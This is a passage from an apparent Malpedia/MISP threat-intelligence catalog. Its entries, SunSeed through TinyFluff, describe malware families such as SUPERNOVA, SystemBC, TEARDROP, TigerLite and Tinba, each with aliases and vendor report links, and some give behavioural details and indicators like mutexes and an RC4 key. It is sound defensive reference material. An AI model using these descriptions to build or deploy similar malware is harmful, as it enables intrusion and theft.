https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer

https://cdn.pathfactory.com/assets/10555/contents/394789/0dd521f8-aa64-4517-834e-bc852e9ab95d.pdf

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.tesorion.nl/en/posts/shining-a-light-on-suncrypts-curious-file-encryption-mechanism/

https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/

https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel

https://www.trendmicro.com/en_us/research/22/g/gootkit-loaders-updated-tactics-and-fileless-delivery-of-cobalt-strike.html

https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html

SunSeed

According to Proofpoint, this is a Lua-based malware likely used by a nation-state sponsored attacker used to target European government personnel involved in managing the logistics of refugees fleeing Ukraine.

The tag is: misp-galaxy:malpedia="SunSeed"

SunSeed is also known as:

Table 4701. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sunseed

https://blogs.blackberry.com/en/2022/03/threat-thursday-sunseed-malware

https://www.proofpoint.com/us/blog/threat-insight/asylum-ambuscade-state-actor-uses-compromised-private-ukrainian-military-emails

SuperBear RAT

The tag is: misp-galaxy:malpedia="SuperBear RAT"

SuperBear RAT is also known as:

Table 4702. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.superbear

https://0x0v1.com/posts/superbear/superbear/

SUPERNOVA

According to CISA, SUPERNOVA is a malicious webshell backdoor that allows a remote operator to dynamically inject C# source code into a web portal to subsequently inject code. APT actors use SUPERNOVA to perform reconnaissance, conduct domain mapping, and steal sensitive information and credentials.

The tag is: misp-galaxy:malpedia="SUPERNOVA"

SUPERNOVA is also known as:

Table 4703. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova

https://unit42.paloaltonetworks.com/solarstorm-supernova

https://twitter.com/MalwareRE/status/1342888881373503488

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a

https://www.splunk.com/en_us/blog/security/detecting-supernova-malware-solarwinds-continued.html

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://github.com/fireeye/sunburst_countermeasures/pull/5

https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/

https://unit42.paloaltonetworks.com/solarstorm-supernova/

https://www.solarwinds.com/securityadvisory

https://us-cert.cisa.gov/ncas/alerts/aa21-008a

https://www.sentinelone.com/labs/solarwinds-understanding-detecting-the-supernova-webshell-trojan

https://github.com/fireeye/sunburst_countermeasures

https://www.guidepointsecurity.com/blog/supernova-solarwinds-net-webshell-analysis

https://www.youtube.com/watch?v=7WX5fCEzTlA

https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/

https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://www.anquanke.com/post/id/226029

https://www.solarwinds.com/securityadvisory/faq

https://www.secureworks.com/blog/supernova-web-shell-deployment-linked-to-spiral-threat-group

https://www.cisa.gov/news-events/analysis-reports/ar21-112a

https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html

https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html

surtr

According to PCrisk, Surtr is ransomware. Malware of this type encrypts files (and renames them) and generates a ransom note. Surtr appends the decryptmydata@mailfence.com email address and the ".SURT" extension to filenames.

The tag is: misp-galaxy:malpedia="surtr"

surtr is also known as:

Table 4705. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.surtr

https://citizenlab.ca/2013/08/surtr-malware-family-targeting-the-tibetan-community/

SVCReady

According to PCrisk, SVCReady collects information about the infected system such as username, computer name, time zone, computer manufacturer, BIOS, and firmware. Also, it gathers lists of running processes and installed software. SVCReady sends collected data to the C2 server. Additionally, SVCReady attempts to maintain its foothold on the system by creating a scheduled task.

The tag is: misp-galaxy:malpedia="SVCReady"

SVCReady is also known as:

Table 4706. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.svcready

https://www.socinvestigation.com/new-svcready-malware-loads-from-word-doc-properties-detection-response/

https://threatresearch.ext.hp.com/svcready-a-new-loader-reveals-itself/

swen

The tag is: misp-galaxy:malpedia="swen"

swen is also known as:

Table 4707. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.swen

https://en.wikipedia.org/wiki/Swen_(computer_worm)

SwiftSlicer

According to ESET, this is a wiper written in Go, that was deployed against an Ukrainian organization on January 25th 2023 through Group Policy, which suggests that the attackers had taken control of the victim’s Active Directory environment.

The tag is: misp-galaxy:malpedia="SwiftSlicer"

SwiftSlicer is also known as:

  • JaguarBlade

Table 4708. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.swiftslicer

https://twitter.com/ESETresearch/status/1618960022150729728

https://www.microsoft.com/en-us/security/business/security-insider/wp-content/uploads/2023/03/A-year-of-Russian-hybrid-warfare-in-Ukraine_MS-Threat-Intelligence-1.pdf

https://www.welivesecurity.com/2023/01/27/swiftslicer-new-destructive-wiper-malware-ukraine/

Synth Loader

The tag is: misp-galaxy:malpedia="Synth Loader"

Synth Loader is also known as:

Table 4714. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.synth_loader

Syscon

SYSCON is a Remote Access Trojan used in a targeted champing against US government agencies. It has been recently observed in conjunction with CARROTBAT and CARROTBALL downloaders and it uses the File Transfer Protocol as Command and Control channel. Use of the family is attributed by Unit 42 to the Konni Group.

The tag is: misp-galaxy:malpedia="Syscon"

Syscon is also known as:

Table 4716. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.syscon

https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/

http://blog.trendmicro.com/trendlabs-security-intelligence/syscon-backdoor-uses-ftp-as-a-cc-channel/

https://unit42.paloaltonetworks.com/the-fractured-statue-campaign-u-s-government-targeted-in-spear-phishing-attacks/

SysJoker (Windows)

Sysjoker is a backdoor malware that was first discovered in December 2021 by Intezer. It is sophisticated and written from scratch in C++. Sysjoker is a cross-platform malware that has Linux, Windows, and macOS variants. Possible attack vectors for Sysjoker are email attachments, malicious advertisements, and trojanized software.

The tag is: misp-galaxy:malpedia="SysJoker (Windows)"

SysJoker (Windows) is also known as:

Table 4718. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysjoker

https://www.intezer.com/blog/malware-analysis/new-backdoor-sysjoker/

https://www.bleepingcomputer.com/news/security/new-sysjoker-backdoor-targets-windows-macos-and-linux/

https://blogs.vmware.com/security/2022/03/%e2%80%afsysjoker-an-analysis-of-a-multi-os-rat.html

https://research.checkpoint.com/2023/israel-hamas-war-spotlight-shaking-the-rust-off-sysjoker/

Sysraw Stealer

Sysraw stealer got its name because at some point, it was started as "ZSysRaw\sysraw.exe". PDB strings suggest the name "Clipsa" though. First stage connects to /WPCoreLog/, the second one to /WPSecurity/. Its behavior suggest that it is an info stealer. It creates a rather large amount of files in a subdirectory (e.g. data) named "1?[-+].dat" and POSTs them.

The tag is: misp-galaxy:malpedia="Sysraw Stealer"

Sysraw Stealer is also known as:

  • Clipsa

Table 4720. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysraw_stealer

https://decoded.avast.io/janrubin/clipsa-multipurpose-password-stealer/

https://zerophagemalware.com/2017/09/21/rig-ek-via-rulan-drops-an-infostealer/

Sysrv-hello (Windows)

Sysrv is a Golang written Cryptojacking malware. There are Windows and Linux variants.

The tag is: misp-galaxy:malpedia="Sysrv-hello (Windows)"

Sysrv-hello (Windows) is also known as:

Table 4721. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysrv_hello

https://www.lacework.com/blog/sysrv-hello-expands-infrastructure/

https://darktrace.com/blog/worm-like-propagation-of-sysrv-hello-crypto-jacking-botnet

SysScan

The tag is: misp-galaxy:malpedia="SysScan"

SysScan is also known as:

Table 4722. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.sysscan

SystemBC

SystemBC is a proxy malware leveraging SOCKS5. Based on screenshots used in ads on a underground marketplace, Proofpoint decided to call it SystemBC.

SystemBC has been observed occasionally, but more pronounced since June 2019. First samples goes back to October 2018.

The tag is: misp-galaxy:malpedia="SystemBC"

SystemBC is also known as:

  • Coroxy

  • DroxiDat

Table 4723. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc

https://cyber.wtf/2023/02/09/defeating-vmprotects-latest-tricks/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself/

https://medium.com/walmartglobaltech/systembc-powershell-version-68c9aad0f85c

https://www.logpoint.com/en/blog/emerging-threat/defending-against-8base/

https://www.intrinsec.com/proxynotshell-owassrf-merry-xchange/

https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6

https://www.bitsight.com/blog/systembc-multipurpose-proxy-bot-still-breathes

https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/

https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/

https://www.elastic.co/security-labs/cuba-ransomware-campaign-analysis

https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits

https://community.riskiq.com/article/47766fbd

https://blogs.vmware.com/security/2023/06/8base-ransomware-a-heavy-hitting-player.html

https://securelist.com/focus-on-droxidat-systembc/110302/

https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/

https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-batloader

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/play-ransomware-volume-shadow-copy

https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html

https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023

https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/

https://news.sophos.com/en-us/2020/12/16/systembc/

https://www.cert.ssi.gouv.fr/uploads/CERTFR-2023-CTI-007.pdf

https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html

https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders

https://securityintelligence.com/posts/trickbot-conti-crypters-where-are-they-now/

https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor

https://web.archive.org/web/20230209123148/https://www.cybereason.com/hubfs/THREAT%20ALERT%20GootLoader%20-%20Large%20payload%20leading%20to%20compromise%20(BLOG).pdf

https://www.cisa.gov/uscert/ncas/alerts/aa22-249a

https://www.bitsight.com/blog/emotet-botnet-rises-again

https://asec.ahnlab.com/en/33600/

https://docs.velociraptor.app/exchange/artifacts/pages/systembc/

https://github.com/vc0RExor/Malware-Threat-Reports/blob/main/The%20Swiss%20Knife%20-%20SystemBC%20%7C%20Coroxy/The%20Swiss%20Knife-SystemBC_EN.pdf

https://www.kroll.com/en/insights/publications/cyber/black-basta-technical-analysis

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.reliaquest.com/blog/gootloader-infection-credential-access/

https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

Tandfuy

The tag is: misp-galaxy:malpedia="Tandfuy"

Tandfuy is also known as:

Table 4729. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tandfuy

Tapaoux

The tag is: misp-galaxy:malpedia="Tapaoux"

Tapaoux is also known as:

Table 4730. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tapaoux

TClient

Steve Miller pointed out that it is proxy-aware (Tencent) for C&C communication and uses wolfSSL, which makes it stick out.

The tag is: misp-galaxy:malpedia="TClient"

TClient is also known as:

  • FIRESHADOW

Table 4734. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tclient

https://twitter.com/stvemillertime/status/1266050369370677249

tDiscoverer

F-Secure described tDiscoverer (also known as HammerDuke) as interesting because it is written in .NET, and even more so because of its occasional use of Twitter as a C&C communication channel. Some HammerDuke variants only contain a hardcoded C&C server address from which they will retrieve commands, but other HammerDuke variants will first use a custom algorithm to generate a Twitter account name based on the current date. If the account exists, HammerDuke will then search for tweets from that account with links to image files that contain embedded commands for the toolset to execute.

The tag is: misp-galaxy:malpedia="tDiscoverer"

tDiscoverer is also known as:

  • HAMMERTOSS

  • HammerDuke

Table 4735. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tdiscoverer

https://www2.fireeye.com/rs/848-DID-242/images/rpt-apt29-hammertoss.pdf

https://securityintelligence.com/hammertoss-what-me-worry/

https://mrtiepolo.medium.com/sophisticated-apt29-campaign-abuses-notion-api-to-target-the-european-commission-200188059f58

https://www.youtube.com/watch?v=UE9suwyuic8

TDTESS

The tag is: misp-galaxy:malpedia="TDTESS"

TDTESS is also known as:

Table 4736. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tdtess

http://www.clearskysec.com/tulip/

TEARDROP

TEARDROP is a memory only dropper that runs as a service, spawns a thread and reads from the file “gracious_truth.jpg”, which likely has a fake JPG header. Next it checks that HKU\SOFTWARE\Microsoft\CTF exists, decodes an embedded payload using a custom rolling XOR algorithm and manually loads into memory an embedded payload using a custom PE-like file format. TEARDROP does not have code overlap with any previously seen malware. FireEye believe that this was used to execute a customized Cobalt Strike BEACON.

The tag is: misp-galaxy:malpedia="TEARDROP"

TEARDROP is also known as:

Table 4738. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.teardrop

https://unit42.paloaltonetworks.com/atoms/solarphoenix/

https://www.youtube.com/watch?v=LA-XE5Jy2kU

https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline

https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds

https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more

https://file2.api.drift.com/download/drift-prod-file-uploads/417f%2F417f74ae8ddd24aa7c2b43a23093983f/Supply%20Chain%20Attacks_%20Cyber%20Criminals%20Target%20the%20Weakest%20Link.pdf

https://www.mandiant.com/resources/unc2452-merged-into-apt29

https://research.checkpoint.com/2020/sunburst-teardrop-and-the-netsec-new-normal/

https://twitter.com/TheEnergyStory/status/1342041055563313152

https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html

https://www.accenture.com/us-en/blogs/cyber-defense/threat-intel-takeaways-solarigate

https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack

https://blog.bushidotoken.net/2022/07/space-invaders-cyber-threats-that-are.html

https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader

https://www.microsoft.com/security/blog/2021/03/04/goldmax-goldfinder-sibot-analyzing-nobelium-malware

https://twitter.com/TheEnergyStory/status/1346096298311741440

https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b

https://github.com/fireeye/sunburst_countermeasures

https://www.microsoft.com/security/blog/2020/12/28/using-microsoft-365-defender-to-coordinate-protection-against-solorigate/

https://medium.com/mitre-attack/identifying-unc2452-related-techniques-9f7b6c7f3714

https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/

https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-raindrop-malware

https://www.sans.org/webcasts/contrarian-view-solarwinds-119515

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf

https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/

https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/

https://twitter.com/craiu/status/1339954817247158272

https://www.brighttalk.com/webcast/7451/462719

https://0xc0decafe.com/malware-analyst-guide-to-pe-timestamps/

https://www.youtube.com/watch?v=GfbxHy6xnbA

TefoSteal

The tag is: misp-galaxy:malpedia="TefoSteal"

TefoSteal is also known as:

Table 4739. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tefosteal

https://twitter.com/WDSecurity/status/1105990738993504256

TelAndExt

According to Check Point, this is a Telegram-focused infostealer (FTP / Delphi) used to target Iranian expats and dissidents.

The tag is: misp-galaxy:malpedia="TelAndExt"

TelAndExt is also known as:

Table 4740. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.telandext

https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/

TelB

According to Check Point, this is a Telegram-focused infostealer (SOAP / Delphi) used to target Iranian expats and dissidents.

The tag is: misp-galaxy:malpedia="TelB"

TelB is also known as:

Table 4741. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.telb

https://research.checkpoint.com/2020/rampant-kitten-an-iranian-espionage-campaign/

TelegramGrabber

The tag is: misp-galaxy:malpedia="TelegramGrabber"

TelegramGrabber is also known as:

Table 4744. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.telegram_grabber

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/old-cat-new-tricks.html

Telemiris

The tag is: misp-galaxy:malpedia="Telemiris"

Telemiris is also known as:

Table 4745. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.telemiris

https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/

Teleport

Cisco Talos reports that this is a data exfiltration tool used by TA505.

The tag is: misp-galaxy:malpedia="Teleport"

Teleport is also known as:

Table 4746. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.teleport

https://blog.talosintelligence.com/breaking-the-silence-recent-truebot-activity/

TellYouThePass

According to PCrisk, Tellyouthepass is one of many ransomware-type programs used to block access to files by encryption and keep them in this state unless a ransom is paid.

The program renames all encrypted files by adding the ".locked" extension and creates a ransom message in a text file called "README.html". For example, "1.jpg" is renamed by Tellyouthepass to "1.jpg.locked".

According to cyber criminals, this ransomware encrypts data using RSA-1024 and AES-256 cryptography algorithms.

The tag is: misp-galaxy:malpedia="TellYouThePass"

TellYouThePass is also known as:

Table 4747. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tellyouthepass

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/log4j-vulnerabilities-attacks

https://www.crowdstrike.com/blog/tellyouthepass-ransomware-analysis-reveals-modern-reinterpretation-using-golang/

Tempedreve

The tag is: misp-galaxy:malpedia="Tempedreve"

Tempedreve is also known as:

Table 4748. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tempedreve

TempStealer

According to Cyble, this is a stealer targeting several crypto currency wallets along browser data.

The tag is: misp-galaxy:malpedia="TempStealer"

TempStealer is also known as:

Table 4749. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.temp_stealer

https://blog.cyble.com/2022/10/20/infostealer-distributed-using-bundled-installer/

TerraRecon

According to QuoINT TerraRecon is a reconnaissance tool, looking for a specific piece of hardware and software targeting retail and payment services sectors. Attributed to Golden Chickens.

The tag is: misp-galaxy:malpedia="TerraRecon"

TerraRecon is also known as:

  • Taurus Loader Reconnaissance Module

Table 4754. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_recon

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

TerraStealer

According to QuoINT, TerraStealer (also known as SONE or StealerOne) is a generic reconnaissance tool, targeting for example email clients, web browsers, and file transfer utilities. Attributed to Golden Chickens.

The tag is: misp-galaxy:malpedia="TerraStealer"

TerraStealer is also known as:

  • SONE

  • StealerOne

  • Taurus Loader Stealer Module

Table 4755. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_stealer

https://twitter.com/3xp0rtblog/status/1275746149719252992

https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

https://github.com/eset/malware-ioc/tree/master/evilnum

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

TerraTV

TerraTV is a custom DLL designed to hijack legit TeamViewer applications. It was discovered and documented by QuoINT. It has been attributed to Golden Chickens malware as a service group.

The tag is: misp-galaxy:malpedia="TerraTV"

TerraTV is also known as:

  • Taurus Loader TeamViewer Module

Table 4756. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv

https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf

https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/

https://blog.minerva-labs.com/taurus-user-guided-infection

https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9

TFlower

TFlower is a new ransomware targeting mostly corporate networks discovered in August, 2019. It is reportedly installed on networks by attackers after they gain access via RDP. TFlower displays a console showing activity being performed by the ransomware when it encrypts a machine, further indicating that this ransomware is triggered by the attacker post compromise, similar to Samsam/Samas in terms of TTP. Once encryption is started, the ransomware will conduct a status report to an apparently hard-coded C2. Shadow copies are deleted and the Windows 10 repair environment is disabled by this ransomware. This malware also will terminate any running Outlook.exe process so that the mail files can be encrypted. This ransomware does not add an extention to encrypted files, but prepends the marker "*tflower" and what may be the encrypted encryption key for the file to each affected file. Once encryption is completed, another status report is sent to the C2 server.

The tag is: misp-galaxy:malpedia="TFlower"

TFlower is also known as:

Table 4758. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tflower

https://www.bleepingcomputer.com/news/security/tflower-ransomware-the-latest-attack-targeting-businesses/

https://www.sygnia.co/mata-framework

https://cyber.gc.ca/en/alerts/tflower-ransomware-campaign

Thanatos

The tag is: misp-galaxy:malpedia="Thanatos"

Thanatos is also known as:

  • Alphabot

Table 4759. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thanatos

https://www.proofpoint.com//us/threat-insight/post/Death-Comes-Calling-Thanatos-Alphabot-Trojan-Hits-Market

ThinMon

The tag is: misp-galaxy:malpedia="ThinMon"

ThinMon is also known as:

Table 4761. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thinmon

https://mp.weixin.qq.com/s/nyxZFXgrtm2-tBiV3-wiMg

ThreeByte

The tag is: misp-galaxy:malpedia="ThreeByte"

ThreeByte is also known as:

Table 4762. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.threebyte

https://www.fireeye.com/blog/threat-research/2014/09/darwins-favorite-apt-group-2.html

ThumbThief

The tag is: misp-galaxy:malpedia="ThumbThief"

ThumbThief is also known as:

Table 4763. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief

http://www.welivesecurity.com/2016/03/23/new-self-protecting-usb-trojan-able-to-avoid-detection/

Thunker

The tag is: misp-galaxy:malpedia="Thunker"

Thunker is also known as:

Table 4765. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.thunker

TigerLite

TigerLite is a TCP downloader.

It creates mutexes like "qtrgads32" or "Microsoft32".

It uses RC4 with the key "MicrosoftCorporationValidation@#$%^&*()!US" for decryption of its character strings, and a custom algorithm for encryption and decryption of network traffic.

It supports from 5 up to 8 commands with the following identifiers: 1111, 1234, 2099/3333, 4444, 8877, 8888, 9876, 9999. The commands mostly perform various types of execution - either of code received from the server, or native Windows commands, with their output collected and sent back to the server.

TigerLite is an intermediate step of a multi-stage attack, in which Tiger RAT is usually the next step. This malware was observed in attacks against South Korean entities in H1 2021.

The tag is: misp-galaxy:malpedia="TigerLite"

TigerLite is also known as:

Table 4767. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tigerlite

https://www.malwarebytes.com/blog/threat-intelligence/2021/04/lazarus-apt-conceals-malicious-code-within-bmp-file-to-drop-its-rat

https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf

https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

https://ti.qianxin.com/blog/articles/Analysis-of-attacks-by-Lazarus-using-Daewoo-shipyard-as-bait/

Tiger RAT

This is third stage backdoor mentioned in the Kaspersky blog, "Andariel evolves to target South Korea with ransomware". The third stage payload was created via the second stage payload, is interactively executed in the operation and exists in both x64 and x86 versions. Most of them use Internet Explorer or Google Chrome icons and corresponding file names to disguise themselves as legitimate internet browsers. The malware decrypts the embedded payload at runtime. It uses an embedded 16-byte XOR key to decrypt the base64 encoded payload. The decrypted payload is another portable executable file that runs in memory. Before getting decrypted with a hardcoded XOR key, the backdoor also checks for sandbox environment. The backdoor has some code overlap with a know malware family PEBBLEDASH, attributed to Lazarus/LABYRINTH CHOLLIMA.

The tag is: misp-galaxy:malpedia="Tiger RAT"

Tiger RAT is also known as:

Table 4768. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat

https://media.defense.gov/2023/Feb/09/2003159161/-1/-1/0/CSA_RANSOMWARE_ATTACKS_ON_CI_FUND_DPRK_ACTIVITIES.PDF

https://asec.ahnlab.com/en/56405/

https://www.brighttalk.com/webcast/18282/493986

https://blogs.vmware.com/security/2021/12/tigerrat-advanced-adversaries-on-the-prowl.html

https://www.attackiq.com/2023/01/05/emulating-the-highly-sophisticated-north-korean-adversary-lazarus-group/

https://blog.talosintelligence.com/2022/09/lazarus-magicrat.html

https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf

https://asec.ahnlab.com/ko/56256/

https://threatray.com/wp-content/uploads/2021/12/threatray-establishing-the-tigerrat-and-tigerdownloader-malware-families.pdf

https://asec.ahnlab.com/ko/58215/

https://securelist.com/andariel-evolves-to-target-south-korea-with-ransomware/102811/

https://asec.ahnlab.com/wp-content/uploads/2021/11/Lazarus-%EA%B7%B8%EB%A3%B9%EC%9D%98-NukeSped-%EC%95%85%EC%84%B1%EC%BD%94%EB%93%9C-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C.pdf

tildeb

Standalone implant. Potentially tied to a framework called PATROLWAGON.

The tag is: misp-galaxy:malpedia="tildeb"

tildeb is also known as:

Table 4769. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb

https://documents.trendmicro.com/assets/tech-brief-tildeb-analyzing-the-18-year-old-implant-from-the-shadow-brokers-leak.pdf

Tinba

F-Secure notes that TinyBanker or short Tinba is usually distributed through malvertising (advertising content that leads the user to sites hosting malicious threats), exploit kits and spam email campaigns. According to news reports, Tinba has been found targeting bank customers in the United States and Europe.

If Tinba successfully infects a device, it can steal banking and personal information through webinjects. To do this, the malware monitors the user’s browser activity and if specific banking portals are visited, Tinba injects code to present the victim with fake web forms designed to mimic the legitimate web site. The malware then tricks them into entering their personal information, log-in credentials, etc in the legitimate-looking page.

Tinba may also display socially-engineered messages to lure or pressure the user into entering their information on the fake page; for example, a message may be shown which attempts to convince the victim that funds were accidentally deposited to his account and must be refunded immediately.

The tag is: misp-galaxy:malpedia="Tinba"

Tinba is also known as:

  • Illi

  • TinyBanker

  • Zusy

Table 4770. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tinba

http://stopmalvertising.com/malware-reports/mini-analysis-of-the-tinybanker-tinba.html

http://garage4hackers.com/entry.php?b=3086

https://blogs.blackberry.com/en/2019/03/blackberry-cylance-vs-tinba-banking-trojan

https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree

http://securityintelligence.com/tinba-malware-reloaded-and-attacking-banks-around-the-world/

https://adalogics.com/blog/the-state-of-advanced-code-injections

https://blog.talosintelligence.com/2022/02/threat-roundup-0204-0211.html

https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/

https://securityintelligence.com/tinba-trojan-sets-its-sights-on-romania/

https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf

https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant

http://www.theregister.co.uk/2012/06/04/small_banking_trojan/

http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf

http://contagiodump.blogspot.com/2012/06/amazon.html

TinyFluff

TinyFluff is a dropper developed by the OldGremlin group. In one of their March '22 campaigns, TinyFluff included a JavaScript RAT with a time-independent DGA.

The tag is: misp-galaxy:malpedia="TinyFluff"

TinyFluff is also known as:

Table 4771. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/win.tinyfluff

https://www.group-ib.com/blog/oldgremlin-comeback/

TinyNuke

